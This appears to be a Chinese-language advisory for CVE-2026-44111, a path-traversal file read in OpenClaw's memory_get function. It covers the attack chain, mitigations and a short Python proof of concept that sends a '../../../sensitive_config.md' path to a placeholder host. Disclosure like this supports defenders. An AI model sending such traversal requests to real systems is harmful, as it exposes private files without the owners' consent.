CVE-2026-44111 CVSS 4.3 中危

CVE-2026-44111 OpenClaw 任意文件读取漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44111

漏洞类型

任意文件读取

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.4.15之前的版本在QMD后端memory_get函数中存在任意文件读取漏洞。由于缺乏严格的路径限制，拥有memory工具访问权限的攻击者可以读取工作区根目录下的任意Markdown文件，造成敏感信息泄露。

技术细节

该漏洞源于OpenClaw软件QMD后端组件中`memory_get`函数的输入验证机制失效。该函数设计初衷是检索特定的内存片段或经过索引的QMD（Query Metadata）结果集。然而，由于开发人员未能对用户传入的“路径”参数实施严格的边界检查和路径规范化处理，导致攻击者可以引入目录遍历序列或相对路径。攻击者首先需要具备低权限的用户账户（PR:L），并能够访问memory工具接口。利用此漏洞时，攻击者通过构造包含恶意文件路径的HTTP请求，欺骗服务器读取并返回工作区根目录下的任意Markdown格式文件。尽管该漏洞不直接影响系统完整性或可用性，且局限于Markdown文件，但其造成的机密性影响（C:L）不容忽视，攻击者可借此获取敏感的业务逻辑、配置数据或私人文档。

攻击链分析

STEP 1

侦察与访问

攻击者获取OpenClaw平台的低权限用户账户，并确认可以访问memory工具接口。

STEP 2

路径遍历构造

攻击者分析memory_get函数的逻辑，构造包含特殊路径字符（如../）的请求参数，旨在指向工作区根目录下的非预期Markdown文件。

STEP 3

发送恶意请求

攻击者向QMD后端的memory_get接口发送包含恶意路径的API调用。

STEP 4

信息泄露

服务器端未进行有效校验，直接读取并返回了指定路径的Markdown文件内容，攻击者获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "http://vulnerable-host:port/api/qmd/memory_get"

# Attacker-controlled session cookie or auth token
headers = {
    "Authorization": "Bearer <low_privilege_token>"
}

# Payload specifying a markdown file path within the workspace root
# Exploiting the lack of path validation in memory_get
payload = {
    "path": "../../../sensitive_config.md"
}

try:
    response = requests.post(target_url, json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Vulnerability Exploited Successfully!")
        print("[+] File Content:")
        print(response.text)
    else:
        print("[-] Request failed with status code:", response.status_code)
except Exception as e:
    print("[-] Error:", str(e))

影响范围

OpenClaw < 2026.4.15

防御指南

临时缓解措施

建议立即升级到最新版本以修复漏洞。如果无法立即升级，应通过网络策略严格限制对OpenClaw接口的访问，特别是对memory工具的调用权限，确保仅受信任的用户可以访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表